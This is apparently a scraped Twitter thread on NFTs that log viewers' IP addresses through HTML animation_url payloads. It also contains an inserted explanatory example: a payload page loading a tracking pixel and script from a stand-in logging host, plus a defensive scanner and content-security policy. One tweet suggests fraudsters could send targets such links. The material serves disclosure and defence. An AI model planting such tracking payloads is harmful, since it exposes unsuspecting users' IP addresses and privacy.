Last week publicly disclosed a similar NFT IP logging exploit that allowed an attacker to send an NFT to a metamask wallet and obtain a user's IP address. twitter.com/alxlpsc/status (3/n)
Quote Tweet
My team and I discovered a critical privacy #vulnerability in the most popular #crypto #wallet. Are you using MetaMask? Well, I have bad news for you - your #privacy is at risk! @samczsun @gakonst @VitalikButerin @cz_binance @phildaian medium.com/@alxlpsc/criti
Shortly thereafter, stated that they were going to fix the issue in MetaMask. twitter.com/danfinlay/stat (4/n)
Quote Tweet
Replying to @alxlpsc @sniko_ and 5 others
Yeah, I think this issue has been widely known for a long time, so I don't think a disclosure period applies. Alex is right to call us out for not addressing it sooner. Starting work on it now. Thanks for the kick in the pants, and sorry we needed it. twitter.com/shazow/status/
The way it works is OpenSea allows NFT creators to add an 'animation_url' to the metadata. Animation_urls support several file extensions including .html. The "payload" is just an HTML page that loads the NFT image and an "invisible pixel" tracker from IPlogger(.)org
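To make the mechanism in the tweet above concrete, here is an added example (not code from the thread, OpenSea, or IPlogger): a constructed NFT metadata object whose animation_url points at an HTML document, a constructed payload page that loads the image plus a 1x1 tracking pixel from a third-party host, and a small scanner a marketplace or wallet could run before rendering such a payload. The hosts (ipfs.io as the allowlisted gateway, logger.example as the tracker) and the CIDs are made up for illustration.

```javascript
// Added example, Node.js, no dependencies. Everything below is constructed
// for illustration; none of the hosts or CIDs are real.

// Constructed metadata in the OpenSea style: animation_url is an HTML file,
// which viewers will render in the user's browser.
const sampleMetadata = {
  name: "Example #1",
  image: "ipfs://bafyexamplecid/image.png",
  animation_url: "ipfs://bafyexamplecid/viewer.html",
};

// Constructed payload: shows the artwork, then loads an invisible pixel and a
// script from a logging host. The viewer's browser issues those requests, so
// the logging host learns the viewer's IP address and user agent.
const samplePayload = `<!doctype html>
<html><body style="margin:0">
<img src="https://ipfs.io/ipfs/bafyexamplecid/image.png" style="width:100%">
<img src="https://logger.example/pixel.gif?nft=1" width="1" height="1" style="opacity:0">
<script src="https://logger.example/track.js"></script>
</body></html>`;

// Does animation_url point at an HTML document? (Query string and fragment ignored.)
function animationUrlIsHtml(metadata) {
  const v = metadata.animation_url;
  if (typeof v !== "string") return false;
  const path = v.split(/[?#]/)[0].toLowerCase();
  return path.endsWith(".html") || path.endsWith(".htm");
}

// Pull URLs out of src/href attributes. A regex is fine for this demo; a
// production scanner should use a real HTML parser (srcset, CSS url(), etc.).
function extractResourceUrls(html) {
  const re = /\b(?:src|href)\s*=\s*["']([^"']+)["']/gi;
  const urls = [];
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

// Origins the payload would contact that are not on the viewer's allowlist.
// Relative, data: and non-http(s) URLs cause no egress to a new host and are skipped.
function findThirdPartyLoads(html, allowedHosts) {
  const out = [];
  for (const raw of extractResourceUrls(html)) {
    let u;
    try { u = new URL(raw); } catch { continue; }
    if (u.protocol !== "http:" && u.protocol !== "https:") continue;
    if (!allowedHosts.includes(u.hostname)) out.push(u.origin);
  }
  return [...new Set(out)];
}

// Policy a viewer can attach when it serves (proxies) the payload itself:
// an iframe sandbox without allow-same-origin, and a CSP that confines every
// fetch to the allowlisted hosts and forbids XHR/fetch/WebSocket entirely.
function safeEmbedPolicy(allowedHosts) {
  const hosts = allowedHosts.map((h) => `https://${h}`).join(" ");
  return {
    sandbox: "allow-scripts",
    csp: `default-src 'none'; img-src ${hosts}; media-src ${hosts}; ` +
         `script-src ${hosts}; style-src 'unsafe-inline'; connect-src 'none'`,
  };
}

// Stand-alone run: report what the constructed payload would leak to.
const gatewayAllowlist = ["ipfs.io"];
console.log("animation_url is HTML:", animationUrlIsHtml(sampleMetadata));
console.log("third-party loads:", findThirdPartyLoads(samplePayload, gatewayAllowlist));
console.log("embed policy:", safeEmbedPolicy(gatewayAllowlist));
```

Two caveats a practitioner should keep in mind. The iframe sandbox attribute limits what the payload's script may do, but it does not stop the page from loading images from arbitrary hosts, so it is the CSP that closes the IP leak, and a CSP only takes effect if the viewer controls the document it is delivered with (for example by proxying the HTML through its own origin rather than linking the user straight to the gateway). And the detector is only a heuristic: a payload can fetch resources from CSS, from a script-built URL, or via a redirect on an allowlisted host, which is why the thread's closing question about whether to fetch NFT data from third-party servers at all is the one that matters.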
This shouldn't come as much of a surprise has even open sourced a bunch of fun payloads that you can put in your NFTs to mess with NFT-displaying sites. (and now that it's a bear market he's safe to follow😜) (7/n)
Quote Tweet
Right now there are ~40 payloads that try attack vectors like breaking out of HTML and quotes, SVGs that contain scripts/HTML, data URLs with various datatypes, XSS via markdown, and others. 3/n
Anyways, if you're in the marketing, fraud, or tax collection industries then IP logging NFTs are probably pretty useful to you. There's a bunch of different ways to use them to get user data. The easiest is just to send a target a link to your NFT. (8/11)
There's a bunch of other ways to abuse this to get user IPs. We've noticed a few NFT collections that are probably obtaining user data. Some contributors are working on analyzing this as part of our bug bounty program. twitter.com/convex_labs/st (9/11)
Quote Tweet
Round 2 of our @Honest_NFT bounty has just concluded and we're beginning round 3, with a minimum of 4 ETH in bounties up for grabs. 🧵 (1/9) medium.com/@convexlabs/co
Ultimately, I think the NFT community needs to agree on standards -- are we ok with consumers fetching NFT data off centralized servers? If not, we have to inform consumers and pressure NFT-related services to stop doing this. (10/11)
Is this art?
Quote Tweet
If the metadata stored in the NFT, or the NFT's data structure itself could be considered particularly novel or elegant, then the NFT itself could be considered "art". In my opinion however this is not the case for 99.9% of NFTs. (17/17)